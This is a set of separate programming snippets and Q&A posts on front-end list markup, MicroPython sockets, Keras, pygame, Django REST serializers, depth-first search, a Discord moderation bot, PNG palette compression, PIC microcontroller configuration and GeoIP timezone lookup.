<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Two icons here">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="No icons here"></f7-list-item>
<li>
<ul>
<f7-list-item link="#" title="Ivan Petrov" after="CEO">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Two icons here">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="No icons here"></f7-list-item>
<f7-list-item link="#" title="Ultra long text goes here, no, it is really really long">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="With toggle">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-toggle slot="after"></f7-toggle>
</f7-list-item>
</ul>
</li>
<f7-list-item link="#" title="Ultra long text goes here, no, it is really really long">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="With toggle">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-toggle slot="after"></f7-toggle>
</f7-list-item>
</f7-list>
Mixed, inset
<f7-block-title>Mixed, inset</f7-block-title>
<f7-list>
<f7-list-item link="#" title="Ivan Petrov" after="CEO">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Two icons here">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Ultra long text goes here, no, it is really really long">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="With toggle">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-toggle slot="after"></f7-toggle>
</f7-list-item>
<f7-block-footer>
<p>Here comes some useful information about list above</p>
</f7-block-footer>
</f7-list>
Tablet inset
<f7-block-title>Tablet inset</f7-block-title>
<f7-list tablet-inset>
<f7-list-item link="#" title="Ivan Petrov" after="CEO">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Two icons here">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Ultra long text goes here, no, it is really really long">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-block-footer>
<p>This list block will look like "inset" only on tablets (iPad)</p>
</f7-block-footer>
</f7-list>
Media Lists
<f7-block-title>Media Lists</f7-block-title>
<f7-block>
<p>Media Lists are almost the same as Data Lists, but with a more flexible layout for visualization of more complex data, like products, services, users, etc.</p>
</f7-block>
<f7-block-title>Songs</f7-block-title>
<f7-list media-list>
<f7-list-item
link="#"
title="Yellow Submarine"
after="$15"
subtitle="Beatles"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
>
<img slot="media" src="https://cdn.framework7.io/placeholder/people-160x160-1.jpg" width="80" />
</f7-list-item>
<f7-list-item
link="#"
title="Don't Stop Me Now"
after="$22"
subtitle="Queen"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
>
<img slot="media" src="https://cdn.framework7.io/placeholder/people-160x160-2.jpg" width="80" />
</f7-list-item>
<f7-list-item
link="#"
title="Billie Jean"
after="$16"
subtitle="Michael Jackson"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
>
<img slot="media" src="https://cdn.framework7.io/placeholder/people-160x160-3.jpg" width="80" />
</f7-list-item>
</f7-list>
Mail App
<f7-block-title>Mail App</f7-block-title>
<f7-list media-list>
<f7-list-item
link="#"
title="Facebook"
after="17:14"
subtitle="New messages from John Doe"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></f7-list-item>
<f7-list-item
link="#"
title="John Doe (via Twitter)"
after="17:11"
subtitle="John Doe (@_johndoe) mentioned you on Twitter!"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></f7-list-item>
<f7-list-item
link="#"
title="Facebook"
after="16:48"
subtitle="New messages from John Doe"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></f7-list-item>
<f7-list-item
link="#"
title="John Doe (via Twitter)"
after="15:32"
subtitle="John Doe (@_johndoe) mentioned you on Twitter!"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></f7-list-item>
</f7-list>
Something more simple
<f7-block-title>Something more simple</f7-block-title>
<f7-list media-list>
<f7-list-item
title="Yellow Submarine"
subtitle="Beatles">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-1.jpg" width="44" />
</f7-list-item>
<f7-list-item
link="#"
title="Don't Stop Me Now"
subtitle="Queen">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-2.jpg" width="44" />
</f7-list-item>
<f7-list-item
title="Billie Jean"
subtitle="Michael Jackson">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-3.jpg" width="44" />
</f7-list-item>
</f7-list>
Inset
<f7-block-title>Inset</f7-block-title>
<f7-list media-list inset>
<f7-list-item
link="#"
title="Yellow Submarine"
subtitle="Beatles">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-4.jpg" width="44" />
</f7-list-item>
<f7-list-item
link="#"
title="Don't Stop Me Now"
subtitle="Queen">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-5.jpg" width="44" />
</f7-list-item>
<f7-list-item
link="#"
title="Billie Jean"
subtitle="Michael Jackson">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-6.jpg" width="44" />
</f7-list-item>
</f7-list>
|
Socket won't unbind from address when socket is terminated
After my successive failures using Bluetooth to get my WiPys to communicate, I switched to using WiFi and sockets. It does work; however, using what is basically the example code from the documentation, I cannot soft reset and rerun the module without getting the following error (from the server WiPy):
OSError: [Errno 112] EADDRINUSE
code used:
client:
def socket_thread(p):
sconn = True
while sconn:
# Wait for any action to happen infinitely
l = p.poll()
# Start processing the actions happened
for t in l:
# First element of the returned tuple is the socket itself
sock = t[0]
# Second element of the returned tuple is the events happened
event = t[1]
# If any error or connection drop happened close the socket
if(event & uselect.POLLERR or event & uselect.POLLHUP):
sock.close()
sconn = False
continue
# If the socket is writable then send some data
# The socket becomes writable if the connect() was successful
if(event & uselect.POLLOUT):
# If any error occurs during sending here, do "nothing", poll() will return with error event, close the socket there
try:
sock.send("Data to send")
# We only want to send one message on this socket, in the future wait only for new incoming messages
p.modify(sock, uselect.POLLIN | uselect.POLLHUP | uselect.POLLERR)
except:
pass
# If any new data is received then get it
if(event & uselect.POLLIN):
# If any error occurs during receiving here, do "nothing", poll() will return with error event, close the socket there
try:
r = sock.recv(12)
# If recv() returns with 0 the other end closed the connection
if len(r) == 0:
sock.close()
sconn = False
continue
else:
# Do something with the received data...
print("Data received: " + str(r))
except:
pass
def makesockets():
telem = socket.socket()
telem.setblocking(False)
# Create a new poll object
p = uselect.poll()
# Register the sockets into the poll object, wait for all kind of events
p.register(telem, uselect.POLLIN | uselect.POLLOUT | uselect.POLLHUP | uselect.POLLERR)
try:
telem.connect(socket.getaddrinfo("192.168.4.1", 1235)[0][-1])
print('socket created')
except OSError as e:
if e.args[0] != uerrno.EINPROGRESS:
raise
_thread.start_new_thread(socket_thread, (p,))
server:
def client_thread(clientsocket):
# Receive a maximum of 12 bytes from the client
r = clientsocket.recv(12)
# If recv() returns with 0 the other end closed the connection
if len(r) == 0:
clientsocket.close()
return
else:
# Do something with the received data...
print("Received: {}".format(str(r)))
# Sends back some data
clientsocket.send('nice')
# Close the socket and terminate the thread
clientsocket.close()
# Set up server socket
def createsocket():
serversocket = usocket.socket(usocket.AF_INET, usocket.SOCK_STREAM)
serversocket.setsockopt(usocket.SOL_SOCKET, usocket.SO_REUSEADDR, 1)
serversocket.bind(("192.168.4.1", 1235))
serversocket.settimeout(100)
serversocket.listen(1)
(clientsocket, address) = serversocket.accept()
_thread.start_new_thread(client_thread, (clientsocket,))
I tried adding that but it was unsuccessful. However, the REPL is staying open (not giving me a >>>) on my server after receiving a message, so I think it isn't finishing whatever it is stuck doing. I don't see any reason why it shouldn't finish, though. Doesn't the clientsocket.close() kill the thread?
You can re-initialize the socket after closing it by calling
telem = socket.socket() again. This should prevent the error you are getting.
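A minimal sketch of that suggestion, reusing the names from the client code above (the address, poll object and error handling are assumed to stay the same):
# After a soft reset or a dropped connection, build a brand-new socket object
# instead of reusing the closed one, then register and connect it again.
telem.close()
telem = socket.socket()
telem.setblocking(False)
p.register(telem, uselect.POLLIN | uselect.POLLOUT | uselect.POLLHUP | uselect.POLLERR)
try:
    telem.connect(socket.getaddrinfo("192.168.4.1", 1235)[0][-1])
except OSError as e:
    if e.args[0] != uerrno.EINPROGRESS:
        raise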
|
Permutes the dimensions of the input according to a given pattern.
Inherits From: Layer
tf.keras.layers.Permute(dims, **kwargs)
Useful for e.g. connecting RNNs and convnets together.
Example:
model = Sequential()
model.add(Permute((2, 1), input_shape=(10, 64)))
# now: model.output_shape == (None, 64, 10)
# note: `None` is the batch dimension
Arguments
dims Tuple of integers. Permutation pattern, does not include the samples dimension. Indexing starts at 1. For instance, (2, 1) permutes the first and second dimensions of the input.
Input shape:
Arbitrary. Use the keyword argument input_shape (tuple of integers, does not include the samples axis) when using this layer as the first layer in a model.
Output shape:
Same as the input shape, but with the dimensions re-ordered according to the specified pattern.
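A quick way to confirm the reordering described above (TensorFlow 2.x is assumed):
import tensorflow as tf

# Permute swaps the second and third dimensions; the batch dimension stays put.
inputs = tf.keras.Input(shape=(10, 64))
outputs = tf.keras.layers.Permute((2, 1))(inputs)
print(outputs.shape)  # (None, 64, 10)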
|
If you're a coder and have played any sort of video game, I'm sure that you've caught yourself wondering at least once about how creators like Sega, Treyarch or Nintendo actually put together the finished product. Hopefully this article can satisfy that inner curiosity you've had for how to make some of these games. We'll be using python, because firstly, it's a popular language and secondly, it's super easy to use. Some purists may claim that C++ is the best language for making simple games, but as I said, Python is easy to use and pygame was specifically built just for making games.
So, how do we approach making a game using python and pygame? I've divided the tutorial into 4 major steps:
Getting a hang of how to develop game foundations using a text-based game.
Learning how to use pygame.
Adding sprites.
Putting it all together to make a masterpiece.
For the purposes of this tutorial, we'll be simulating a few games overall, but primarily we'll set our goal to be making a Monopoly game. Rather than just throwing in a lot of lines of code here, I prefer giving the outline and some intuition on how to proceed. All the code used for the tutorial bit can be found here. Without further ado, let's start!
Step 0: The prerequisites
Well, the major prerequisite is being comfortable with basic python syntax. I'll be assuming that you already know python as I move along, but if you don't, there are plenty of sources to learn from. I would recommend MIT OCW's 6.0001, Introduction to Computer Science and Programming in Python, as it's a very structured way to learn the language.
There are a handful of libraries that are useful for game making in python like PyOpenGL and pyglet. However, for this tutorial, I'll be using pygame. It's convenient and fairly easy to work with. To get the pygame library, just hit:
pip3 install pygame
in the terminal or command prompt (if you use Windows).
The only other prerequisite remaining is a tool to draw your characters and backgrounds in. How fancy your designs and characters are is up to you. Personally, I'm not much of a designer and hence a tool like GIMP (Gnu Image Manipulation Program) suffices for me. You can also use Photoshop, Illustrator, Blender or even Tux Paint if that's what suits you. How you design the game is your choice, but it helps if you're thoroughly proficient with at least one design tool.
Step 1 : Rules of the Game
Before we can make our own Assassin's Creed, it's essential that we first get comfortable with the idea of actually writing up code for a video game. You could think of this as just translating the game's principles and rules from English to Python. This is where core CS principles come into play. Proficiency in object-oriented programming goes a long way, but just knowing how to use objects and classes well suffices. The best way to master the skill of enforcing game rules in Python is to remove the graphics aspect entirely from your approach and learn by making text-based games. The code for this section can be found here.
Let's try making a simple business strategy game in python. I'll be making a game based off of monopoly but you're free to try whatever you want. It'll be a text-based game, so don't expect it to look fancy. Before we start coding anything, it's imperative that we first define our rules in English (or whichever language you speak in). Let's say we want this game to be played by two players on a board. The board consists of a set of "places". Each place costs a certain amount of money and has a certain "rent", which is a payment that a player has to pay when landing on a place owned by another player. The places on the board are arranged in a square loop. Each player has some money and owns a certain number of places. In a given turn, each player has a single position defined on the board. Traversal across the board is done by the roll of a die which determines how many positions on the board the player shifts by. A player starts a turn by rolling the die and moving. After moving, if the player lands on a place that has no owner, they are free to either buy the place or pass. If the player lands on a place owned by another player, they pay the owner the required amount of rent. A player loses the game when they run out of money.
Whew! It's exhausting to explain the rules of a simplified form of Monopoly in English, so you can imagine that it'd be even more challenging to code these principles into python. This is why teams of people write up the code for more complicated games like Call of Duty and StarCraft.
Let's try working on it in python. The first thing you'd need to do for that is start by defining all the game characters and mechanics. So we can define players and places (the main entities of the game by classes):
class Player:
def __init__(self):
self.money = 2000
self.position = 0
self.name = "P" + str(len(board))
self.places = []
Similarly, required functions can be implemented to enforce features of the game. I made only one function to implement a single turn for that player. A single turn consists of 2 choices : one where the player can choose to look at his/her owned places before rolling and the second where the player can choose to buy the place they land on. The same function also checks if the player has landed on a place owned by another player and pays rent accordingly.
For movement, a random number is generated and motions along the board are cyclic, meaning that a roll of 4 on the last position of the board will put the player at the 4th position.
diceno = random.randint(1,4)
print("dice shows " + str(diceno))
if (self.position + diceno < len(board)):
self.position += diceno
else:
self.position = self.position + diceno - len(board)
It's left as an exercise for you to implement the remaining game concepts, such as buying and renting (a rough sketch of one possible approach is shown below). However, as mentioned before, the code is available on GitHub for reference.
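Here is a minimal sketch of what the buy/rent step could look like inside a player's turn. The place attributes used here (name, cost, rent, owner) are assumptions for illustration and not necessarily what the GitHub version uses:
# Resolve the place the player just landed on.
place = board[self.position]
if place.owner is None:
    choice = input(self.name + ", buy " + place.name + " for " + str(place.cost) + "? (y/n) ")
    if choice == "y" and self.money >= place.cost:
        self.money -= place.cost
        place.owner = self
        self.places.append(place)
elif place.owner is not self:
    # Landing on somebody else's place costs rent.
    self.money -= place.rent
    place.owner.money += place.rent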
I made a small-scale game with 2 players and 6 places on the board with a four sided die, but you can be as ambitious as you want with the scale of the game.
Step 2 : Working with Pygame
The next skill you need to master is getting comfy with using pygame. It's fairly simple to learn and there are plenty of things you can do with it once you're familiar with it. The best place to learn the intricacies of any python library is to refer the documentation!
In this part of the tutorial, we'll try to make a simple 2D game, where we make a little block that can move around the screen and collect coins. The best way to cover a breadth of pygame features is to be free from the restrictions of complicated game mechanics, so we'll keep the game simple and focus on getting familiar with pygame itself; game mechanics were already covered in Step 1.
Our game will consist of a red box moving around and collecting coins. Each coin we collect will add to our score. We'll also get some music to play in the background. The code for this section is here.
As you can imagine, the first part of our code involves actually importing the pygame library and initialising it. So for that we do:
import pygame
pygame.init() # This is an initialisation function required for all pygame projects.
Following this, we're free to start setting up the global pygame-related variables. Everything on pygame typically runs on what's known as a Surface. The game screen is a surface and so are all image objects you work with. So the next step is to define a game surface for your current project:
win = pygame.display.set_mode((500,500)) # Set size in tuple as required
pygame.display.set_caption("Coin Collector")
To add some music to the game, we're going to use the pygame mixer. Here I've used an mp3 file for the Rustboro soundtrack from Pokemon Ruby. You can add whichever soundtrack you want or even compose your own. The music.play() function for the mixer class takes an argument for number of plays. If the number is set to 0, then it will play once. The value -1 implies that the track will be played indefinitely.
pygame.mixer.music.load('rustboro.mp3')
pygame.mixer.music.play(-1)
The next step is to define the participants of the game. In this case, it's just our little red box. I'll be using an object of type Player (my own class) to define the parameters of the rectangle. To draw the character, use the pygame.draw class like this:
pygame.draw.rect(win, (r, g, b), (x, y, width, height))
where (r, g, b) should be replaced with the colour of your choice. Similarly (x, y, width, height) should be replaced with the x,y position and the width and height of your rectangle.
Pro Tip : It would help to remember that pygame's coordinate system is a bit weird. The top left corner of the object is set as (0,0) instead of the centre, so when you're setting the position of any object, remember that you're most likely defining the position of the top left corner (this rule doesn't apply to drawing circles).
The most central part of the game is the main loop of the game. Once you've decided the objects that are taking part in the game, it's time to set up the main game loop.
The main game loop interacts with the user conveniently using what are known as pygame events. So when you're making the game loop, it is important that each iteration of the loop checks the pygame event list.
run = True
while (run): # You can set the game ending condition to whatever you want
for event in pygame.event.get(): #checks all pygame events.
if event.type == pygame.QUIT: #checks if the game window is closed
run = False
break
You can utilise other events such as key presses and mouse events. For moving the square around, you can look at all the keys that have been pressed like this:
pressed = pygame.key.get_pressed()
if pressed[pygame.K_UP]:
#perform action for pressing the up key
if pressed[pygame.K_DOWN]:
#perform action for down key
if pressed[pygame.K_LEFT]:
#perform action for left key
if pressed[pygame.K_RIGHT]:
#perform action for right key
Naturally this is also included in the main game loop.
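For instance, a minimal sketch of how those key checks might move the red box, assuming the player object p has x and y attributes and some chosen speed:
speed = 5
if pressed[pygame.K_UP]:
    p.y -= speed   # pygame's y axis grows downwards, so "up" subtracts
if pressed[pygame.K_DOWN]:
    p.y += speed
if pressed[pygame.K_LEFT]:
    p.x -= speed
if pressed[pygame.K_RIGHT]:
    p.x += speed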
The most important part of the game loop is defining a refresh function, which changes what you want to print on the screen.
def refresh():
win.fill((0, 0, 0))
p.draw() # This draws the player object that I have defined
for coin in coins: # Draws all the coins, another object I defined
if coin.collected == False:
coin.draw()
score.updatescore(p.numcollected)
pygame.display.update() # This is the most important portion. It updates the pygame screen
And voila, you're done! You can improve on this to define whatever features you want. But my simple game with a rectangle capturing coins was done with this framework and it turned out fine.
Step 3 : Designing sprites
Since I myself am not a design expert, I shall keep this section short. Sprites can be useful in many ways. Firstly, they make the aesthetic of the game more pleasing. You end up dealing with more than just squares and circles. Secondly, you can convey information to the player using the sprite. For example, you can convey whether the player is facing down or up or in any other direction. I used GIMP (Gnu Image Manipulation Program) to design my sprites, and they turned out alright.
However, software that allow more sophistication in design do exist. So do software with less intricacy. You could design in sprites in anything from Tux Paint to Adobe Illustrator, it depends on your convenience more than anything. The best place to learn GIMP is from their website.
To add your own sprites into pygame, use:
img = pygame.image.load('img-path')
Now, the image gets treated like a surface. However, you can blit this surface onto your previous surface using win.blit().
win.blit(img, coordinates) # Enter coordinates as a tuple
Conclusion : Putting it all together
Now that you're familiar with the elemental steps of game-making, which are hard-coding the rules, working with the pygame environment and adding your own sprites into the game, you're ready to go out and make your own. If you remember the monopoly game we made in Step 1, it was actually inspired by my first game development project, which is a full version of monopoly in pygame. You can check it out here.
|
I'm using 2 models in Django Rest Framework.
class Questions(models.Model):
question = models.TextField()
answer = models.TextField()
timestamp = models.DateTimeField(auto_now_add=True)
categories = models.ForeignKey(Categories, related_name="cat_questions", on_delete=models.CASCADE)
class QuestionnaireResult(models.Model):
patient_info = models.ForeignKey(PatientInfo, related_name="+", on_delete=models.CASCADE)
questions = models.ForeignKey(Questions, related_name="result_questions", on_delete=models.CASCADE)
answer_given = models.TextField()
timestamp = models.DateTimeField(auto_now_add=True)
class QuestionnaireResultSerailizer(serializers.ModelSerializer):
class Meta:
model = QuestionnaireResult
fields = '__all__'
class QuestionsSerializer(serializers.ModelSerializer):
result_questions = QuestionnaireResultSerailizer(many=True)
class Meta:
model = Questions
fields ='__all__'
http://localhost:9000/api/questions/1
{
"id": 1,
"result_questions": [
{
"id": 1,
"answer_given": "no",
"timestamp": "2017-10-01T12:28:19.770454Z",
"patient_info": 1,
"questions": 1
},
{
"id": 4,
"answer_given": "no",
"timestamp": "2017-10-01T13:13:19.658930Z",
"patient_info": 2,
"questions": 1
}
],
"question": "digestive ques 1",
"answer": "yes",
"timestamp": "2017-09-30T17:04:59.143857Z",
"categories": 1
}
What I want is to filter the nested result_questions by a patient_info query parameter, so that http://localhost:9000/api/questions/1?patient_info=1 returns:
{
"id": 1,
"result_questions": [
{
"id": 1,
"answer_given": "no",
"timestamp": "2017-10-01T12:28:19.770454Z",
"patient_info": 1,
"questions": 1
}
],
"question": "digestive ques 1",
"answer": "yes",
"timestamp": "2017-09-30T17:04:59.143857Z",
"categories": 1
}
You can try SerializerMethodField:
class QuestionsSerializer(serializers.ModelSerializer):
result_questions = serializers.SerializerMethodField()
class Meta:
model = Questions
fields ='__all__'
def get_result_questions(self, obj):
qs = obj.result_questions.all()
request = self.context.get('request')
patient_info = request.GET.get('patient_info')
if patient_info:
qs = qs.filter(patient_info=patient_info)
return QuestionnaireResultSerailizer(qs, many=True).data
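One assumption behind this answer: self.context['request'] is only there if the request is passed into the serializer context. DRF's generic views and ViewSets do that automatically; if you build the serializer yourself, a view along these lines (the view name is illustrative) is needed:
from rest_framework.response import Response
from rest_framework.views import APIView

class QuestionDetail(APIView):
    def get(self, request, pk):
        question = Questions.objects.get(pk=pk)
        # Passing the request in context is what makes the query-parameter filtering work.
        serializer = QuestionsSerializer(question, context={'request': request})
        return Response(serializer.data)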
|
I am programming the depth-first search algorithm in Python. It's my first time using Python, so I'm not very familiar with its notation. This is the example I was given:
def depthFirstSearch(problem):
stack = util.Stack()
stack.push((problem.getStartState(),[]))
explored = set()
while not stack.isEmpty():
temp = stack.pop()
if problem.isGoalState(temp[0]):
return temp[1]
explored.add(temp[0])
for n in problem.getSuccessors(temp[0]):
if n[0] not in explored and n[0] not in stack.list:
stack.push((n[0], temp[1] + [n[1]]))
return []
What I don't understand is when you pop from the stack and store it in the temporary variable in order to evaluate it: does that refer to just one value, or to several values? When it then calls temp[0] and temp[1], what is it referring to there? From what I understand, the pop must return some kind of sequence whose individual values are then accessed, but I'm not sure.
Thank you very much.
|
Container
The container layout can define the main frame of the page.
<Container> - Container, used for layout.
<Header> - Container header.
<Content> - Container content.
<Footer> - Container footer.
<Sidebar> - Container sidebar.
Import
import { Container, Header, Content, Footer, Sidebar } from 'rsuite';
// or
import Container from 'rsuite/lib/Container';
import Header from 'rsuite/lib/Header';
import Content from 'rsuite/lib/Content';
import Footer from 'rsuite/lib/Footer';
import Sidebar from 'rsuite/lib/Sidebar';
|
How to Make A Discord Bot - Part 6
Hey everyone as promised, I will be posting another tutorial.
Did you know my bot is called Moderation? And what is a moderation bot if it can't ban or kick people? Today, we will be going over banning, kicking and unbanning.
Firstly, we need to know the differences between these 3 operations.
Banning has 2 parts to it, first is to remove the user from the server and second is to block him from ever joining back, even if he has a valid invite link.
Kicking on the other hand is much simpler, it just removes the user from the server, if he has a valid invite link, he can join back.
To unban someone, is to remove that blockage that was previously there to prevent them from joining again. Now, if he has a valid invite link, he can join back.
Banning and Kicking
Now let's get into the code. To be honest, you yourself will be surprised at how short it is.
@client.command()
@commands.has_role('Moderators')
async def kick(ctx,member:discord.Member,*,reason=None):
await member.kick(reason=reason)
#A Ban is pretty much the same
@client.command()
@commands.has_role('Moderators')
async def ban(ctx,member:discord.Member,*,reason=None):
await member.ban(reason=reason)
Something new here is the second argument: we take in member as an argument, but the colon gives it a type annotation, in this case discord.Member, so member is received as a Member object. Lastly, we add a keyword-only argument for reason because the built-in ban function has a reason parameter; if no reason is given, it stays None. You can find the reasons in the audit log of your server.
I also added the command check so only moderators can run this command.
This is how the command will be typed like:
Take note that the Member name is highlighted blue because it is a member object.
Unbanning
This part gets slightly trickier. You can't just unban someone by mentioning them because they are not in your server to mention. If you don't get it, you can just try mentioning a banned member, it won't turn blue.
Instead, we have to get them to manually type the player's whole Discord tag, and we will break it up into the name and the discriminator.
For example: Fishball_Noodles is my Name, and #7209 is my Discriminator.
We will then compare it to the ban entries (aka list of banned players).
This is how it looks like:
@client.command()
@commands.has_role('Moderators')
async def unban(ctx,*,member):
BanList = await ctx.guild.bans()
MemberName, MemberDiscrim = member.split('#')
for BanEntry in BanList:
user = BanEntry.user
if (MemberName,MemberDiscrim) == (user.name,user.discriminator):
await ctx.guild.unban(user)
await ctx.send(f'{user.mention} has been Unbanned')
return
Basically, what we did above was check whether the input member matched both the name and the discriminator of each entry in the ban list. If it matched, the bot unbans that user.
The return stops the loop from checking any further entries.
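An optional extra that is not part of the original tutorial: if the loop finishes without finding a match, you may want to tell the caller. A line like this placed after the for loop would do it:
# Runs only if no ban entry matched the given name#discriminator.
await ctx.send(f'Could not find a banned user matching {member}.')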
OK, that pretty much covers banning, kicking and unbanning. This can be useful if you want moderators to be able to kick and ban people without giving them a full administrator role on your server.
Hope this tutorial was helpful, see you tomorrow for another one.
Once again if you faced any problems regarding any of my tutorials, please feel free to ask in the comments section below.
|
My goal is to draw some polygons on a black image so that the total size of the resulting image file is as small as possible.
So I read a wiki article about indexed colors (link) and it looks like a good option for me (since I only need to support black and 5 other colors, i.e. 6 colors in total), and a PNG image should support mode 'P' (i.e. palette images).
That's why I created this snippet to see what file size I would get for 6 colors and a 1224x1024 image:
from PIL import Image, ImageDraw

# Create a black 1224x1024 image
img = Image.new('P', (1224, 1024))
img.putpalette([
    0, 0, 0,       # black background
    236, 98, 98,   # red color
    236, 98, 97,
    236, 98, 96,
    236, 98, 95,
    236, 98, 94,
])
draw = ImageDraw.Draw(img)
# Draw a random red polygon at the top left corner of the image
draw.polygon(xy=[1, 1, 2, 2, 3, 3, 4, 4], fill=1)
del draw
img.save('1.png', format='PNG')
The resulting image size is 768 bytes, which seems too large to me.
Is there anything I can fix in my code to further reduce the size of the resulting image?
768 bytes does not seem unreasonable to me for representing a 1.2-megapixel image. You can try running the file produced by PIL through pngcrush like this, to see whether a few more bytes can be shaved off:
pngcrush input.png result.png
If you really just want to draw a few solid-color polygons on a black background, I would suggest looking at a vector format, such as the SVG example here, rather than a raster format like PNG et al.
You can also use rsvg to render SVG images to PNG if you need to, but neither your application nor the reason you need such small images is clear from your question, so I have no idea whether that is an option for you.
Here is a 300-byte SVG image with a black background, 2 rectangles, and a polygon as a red star shape in the top left corner:
You can load an SVG into a Numpy array like this:
#!/usr/bin/env python3
import io

import cairosvg
import numpy as np
from PIL import Image

def svgRead(filename):
    """Load an SVG file and return image in Numpy array"""
    # Make memory buffer
    mem = io.BytesIO()
    # Convert SVG to PNG in memory
    cairosvg.svg2png(url=filename, write_to=mem)
    # Convert PNG to Numpy array
    return np.array(Image.open(mem))

# Read SVG file into Numpy array
res = svgRead('image.svg')
If you are set on making the files even smaller, at the price of reduced compatibility with other image viewers, you could design your own very simple format, somewhat like SVG, so that the image represented by the SVG example I gave could be stored as a simple text file:
b,1224,1024,#00000
r,100,200,100,400,#0000ff
r,800,280,100,200,#00ff00
p,9.9,1.1,3.3,21.78,19.8,8.58,0,8.58,16.5,21.78,#ff0000
And that comes to 127 bytes.
You can view your SVG files by loading them into any web browser, or convert one to a PNG with ImageMagick in the terminal like this:
magick input.svg result.png
|
So, you just made your first PIC10F322 XC8 program, uploaded it to the chip and... nothing.
Chances are the culprit is this: did you set up the Device Configuration Bits?
Here is the setup I generally use. Put this at the top of your main.c file, or in a header that you include from main.c. This will get you up and running quickly.
#pragma config FOSC = INTOSC // Oscillator Selection
#pragma config BOREN = ON // Brown-out Reset
#pragma config WDTE = OFF // Watchdog Timer
#pragma config PWRTE = ON // Power-up Timer
#pragma config MCLRE = OFF // MCLR Pin Function Select bit->MCLR pin function is digital input, MCLR internally tied to VDD
#pragma config CP = OFF // Code Protection
#pragma config LVP = OFF // Low-Voltage Programming
#pragma config LPBOR = ON // Brown-out Reset Selection bits
#pragma config BORV = LO // Brown-out Reset Voltage Selection
#pragma config WRT = OFF // Flash Memory Self-Write Protection
|
There is no protocol as such but you could do a GeoIP lookup to get your approximate location and map the location to a timezone.
MaxMind offers a GeoIP database that is accessible via various methods, see http://dev.maxmind.com. You can even get the data in a CSV file and store it locally, but given that you are on an embedded device I suspect you are low on storage and might prefer to just do an online lookup. They have a convenient API that can do a lookup on the requestor's IP address, so you don't need to use any other method to find your external address. In addition, the returned data includes timezone information, so it appears you can get all you need with a single HTTP call. See https://www.maxmind.com/en/locate-my-ip-address
I put together a few lines of Python to show how this could work:
#!/usr/bin/env python
import urllib, json
url = "https://js.maxmind.com/geoip/v2.1/city/me?referrer=https%3A%2F%2Fwww.maxmind.com"
response = urllib.urlopen(url)
data = json.loads(response.read())
print data['location']['time_zone']
# to pretty print all returned data
#print json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))
And when run:
kll $ python ip2tz.py
